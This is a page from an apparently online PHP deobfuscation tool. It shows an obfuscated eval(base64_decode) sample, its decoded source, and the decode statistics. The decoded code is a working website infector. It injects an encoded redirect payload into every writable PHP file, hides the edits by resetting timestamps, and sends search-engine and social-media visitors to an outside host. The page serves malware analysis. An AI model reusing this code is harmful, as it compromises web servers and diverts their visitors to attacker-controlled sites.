Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?PHP eval(base64_decode("c2V0X3RpbWVfbGltaXQoMCk7DQppZ25vcmVfdXNlcl9hYm9ydCgxKTsNCmlmKCF..
Decoded Output download
set_time_limit(0);
ignore_user_abort(1);
if(!isset($_SERVER['DOCUMENT_ROOT']))
{ if(isset($_SERVER['SCRIPT_FILENAME'])){
$_SERVER['DOCUMENT_ROOT'] = str_replace( '\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0-strlen($_SERVER['PHP_SELF'])));
}; };
if(!isset($_SERVER['DOCUMENT_ROOT']))
{ if(isset($_SERVER['PATH_TRANSLATED'])){
$_SERVER['DOCUMENT_ROOT'] = str_replace( '\', '/', substr(str_replace('\', '\', $_SERVER['PATH_TRANSLATED']), 0, 0-strlen($_SERVER['PHP_SELF'])));
}; };
function dir_path($dir) {
$code='
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER[\'HTTP_REFERER\'];
$uag=$_SERVER[\'HTTP_USER_AGENT\'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")) {header("Location: http://www.a1werty.2waky.com/");
exit();
}
}
}
}
}';
$dh = opendir($dir);
$path_curent = '';
while (($file = readdir($dh)) !== false)
if ($file != "." and $file != "..")
{
$path = $dir."/".$file;
makechange($path,$code);
if (is_dir($path) && !stristr($path,"cgi-bin"))
{
$path_curent .= "$path";
$path_curent .= dir_path($path);
}
}
closedir($dh);
return $path_curent;
}
function makechange ($path,$code){
if (is_writable($path)) {
if (is_file($path)) {
if (stristr($path,".php") and !stristr($path,"banner") and !stristr($path,"post") and !stristr($path,"movie") and !stristr($path,"r57") and !stristr($path,"img")){
$fo=file_get_contents ($path);
if (!stristr($fo,"base64")) {
$aa=filectime ($path);
$fi=preg_replace("/<\?php/","<?php eval(base64_decode(\"".base64_encode($code)."\"));",$fo);
$fro=fopen($path,"w");
fwrite ($fro,$fi);
fclose ($fro);
@touch ($path,$aa);
$buo=fopen("l","a+");
fwrite ($buo,$path."
");
fclose($buo);
//echo $path."
";
}else {
$aa=filectime ($path);
$fi=preg_replace("/eval\(base64_decode\(\"(.*?)\"/","eval(base64_decode(\"".base64_encode($code)."\"",$fo);
$fro=fopen($path,"w");
fwrite ($fro,$fi);
fclose ($fro);
@touch ($path,$aa);
$buo=fopen("c","a+");
fwrite ($buo,$path."
");
fclose($buo);
//echo $path."
";
}
}
}
}
}
$docdir=$_SERVER[DOCUMENT_ROOT];
echo $docdir;
$pap=preg_split("/\//",$docdir);
//foreach ($pap as $papp){
for ($i=0;$i<count($pap)-2;$i++){
$updocdir.=$pap[$i]."/";
}
$docdir=$updocdir;
dir_path($docdir);
Did this file decode correctly?
Original Code
<?PHP
eval(base64_decode("c2V0X3RpbWVfbGltaXQoMCk7DQppZ25vcmVfdXNlcl9hYm9ydCgxKTsNCmlmKCFpc3NldCgkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddKSkNCnsgaWYoaXNzZXQoJF9TRVJWRVJbJ1NDUklQVF9GSUxFTkFNRSddKSl7DQoJJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSA9IHN0cl9yZXBsYWNlKCAnXFwnLCAnLycsIHN1YnN0cigkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10sIDAsIDAtc3RybGVuKCRfU0VSVkVSWydQSFBfU0VMRiddKSkpOw0KfTsgfTsNCmlmKCFpc3NldCgkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddKSkNCnsgaWYoaXNzZXQoJF9TRVJWRVJbJ1BBVEhfVFJBTlNMQVRFRCddKSl7DQoJJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSA9IHN0cl9yZXBsYWNlKCAnXFwnLCAnLycsIHN1YnN0cihzdHJfcmVwbGFjZSgnXFxcXCcsICdcXCcsICRfU0VSVkVSWydQQVRIX1RSQU5TTEFURUQnXSksIDAsIDAtc3RybGVuKCRfU0VSVkVSWydQSFBfU0VMRiddKSkpOw0KfTsgfTsNCmZ1bmN0aW9uIGRpcl9wYXRoKCRkaXIpIHsNCgkkY29kZT0nDQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSW1wnSFRUUF9SRUZFUkVSXCddOw0KJHVhZz0kX1NFUlZFUltcJ0hUVFBfVVNFUl9BR0VOVFwnXTsNCmlmICgkdWFnKSB7DQppZiAoIXN0cmlzdHIoJHVhZywiTVNJRSA3LjAiKSBhbmQgIXN0cmlzdHIoJHVhZywiTVNJRSA2LjAiKSl7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKSB7aGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3d3dy5hMXdlcnR5LjJ3YWt5LmNvbS8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0NCn0nOw0KCSRkaCA9IG9wZW5kaXIoJGRpcik7DQoJJHBhdGhfY3VyZW50ID0gJyc7DQoJd2hpbGUgKCgkZmlsZSA9IHJlYWRkaXIoJGRoKSkgIT09IGZhbHNlKQ0KCWlmICgkZmlsZSAhPSAiLiIgYW5kICRmaWxlICE9ICIuLiIpDQoJew0KCQkkcGF0aCA9ICRkaXIuIi8iLiRmaWxlOw0KCQltYWtlY2hhbmdlKCRwYXRoLCRjb2RlKTsNCgkJaWYgKGlzX2RpcigkcGF0aCkgJiYgIXN0cmlzdHIoJHBhdGgsImNnaS1iaW4iKSkNCgkJew0KCQkJJHBhdGhfY3VyZW50IC49ICIkcGF0aCI7DQoJCQkNCgkJCSRwYXRoX2N1cmVudCAuPSBkaXJfcGF0aCgkcGF0aCk7DQoNCgkJfQ0KCX0NCgljbG9zZWRpcigkZGgpOw0KCXJldHVybiAkcGF0aF9jdXJlbnQ7DQp9DQoNCmZ1bmN0aW9uIG1ha2VjaGFuZ2UgKCRwYXRoLCRjb2RlKXsNCglpZiAoaXNfd3JpdGFibGUoJHBhdGgpKSB7DQoJCWlmIChpc19maWxlKCRwYXRoKSkgew0KCQkJaWYgKHN0cmlzdHIoJHBhdGgsIi5waHAiKSBhbmQgIXN0cmlzdHIoJHBhdGgsImJhbm5lciIpIGFuZCAhc3RyaXN0cigkcGF0aCwicG9zdCIpIGFuZCAhc3RyaXN0cigkcGF0aCwibW92aWUiKSBhbmQgIXN0cmlzdHIoJHBhdGgsInI1NyIpIGFuZCAhc3RyaXN0cigkcGF0aCwiaW1nIikpew0KCQkJCSRmbz1maWxlX2dldF9jb250ZW50cyAoJHBhdGgpOw0KCQkJCWlmICghc3RyaXN0cigkZm8sImJhc2U2NCIpKSB7DQoJCQkJCSRhYT1maWxlY3RpbWUgKCRwYXRoKTsNCgkJCQkJJGZpPXByZWdfcmVwbGFjZSgiLzxcP3BocC8iLCI8P3BocAkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAJCQlldmFsKGJhc2U2NF9kZWNvZGUoXCIiLmJhc2U2NF9lbmNvZGUoJGNvZGUpLiJcIikpOyIsJGZvKTsNCgkJCQkJJGZybz1mb3BlbigkcGF0aCwidyIpOw0KCQkJCQlmd3JpdGUgKCRmcm8sJGZpKTsNCgkJCQkJZmNsb3NlICgkZnJvKTsNCgkJCQkJQHRvdWNoICgkcGF0aCwkYWEpOw0KCQkJCQkkYnVvPWZvcGVuKCJsIiwiYSsiKTsNCgkJCQkJZndyaXRlICgkYnVvLCRwYXRoLiJcbiIpOw0KCQkJCQlmY2xvc2UoJGJ1byk7DQoJCQkJCS8vZWNobyAkcGF0aC4iXG4iOw0KCQkJCX1lbHNlIHsNCgkJCQkJJGFhPWZpbGVjdGltZSAoJHBhdGgpOw0KCQkJCQkkZmk9cHJlZ19yZXBsYWNlKCIvZXZhbFwoYmFzZTY0X2RlY29kZVwoXCIoLio/KVwiLyIsImV2YWwoYmFzZTY0X2RlY29kZShcIiIuYmFzZTY0X2VuY29kZSgkY29kZSkuIlwiIiwkZm8pOw0KCQkJCQkkZnJvPWZvcGVuKCRwYXRoLCJ3Iik7DQoJCQkJCWZ3cml0ZSAoJGZybywkZmkpOw0KCQkJCQlmY2xvc2UgKCRmcm8pOw0KCQkJCQlAdG91Y2ggKCRwYXRoLCRhYSk7DQoJCQkJCSRidW89Zm9wZW4oImMiLCJhKyIpOw0KCQkJCQlmd3JpdGUgKCRidW8sJHBhdGguIlxuIik7DQoJCQkJCWZjbG9zZSgkYnVvKTsNCgkJCQkJLy9lY2hvICRwYXRoLiJcbiI7DQoJCQkJfQ0KCQkJfQ0KCQl9DQoJfQ0KfQ0KJGRvY2Rpcj0kX1NFUlZFUltET0NVTUVOVF9ST09UXTsNCmVjaG8gJGRvY2RpcjsNCiRwYXA9cHJlZ19zcGxpdCgiL1wvLyIsJGRvY2Rpcik7DQovL2ZvcmVhY2ggKCRwYXAgYXMgJHBhcHApew0KZm9yICgkaT0wOyRpPGNvdW50KCRwYXApLTI7JGkrKyl7DQokdXBkb2NkaXIuPSRwYXBbJGldLiIvIjsNCn0NCiRkb2NkaXI9JHVwZG9jZGlyOw0KZGlyX3BhdGgoJGRvY2Rpcik7"));
?>
Function Calls
base64_decode | 1 |
Stats
MD5 | c82663a5bbd89aef9a25b660fea39501 |
Eval Count | 1 |
Decode Time | 99 ms |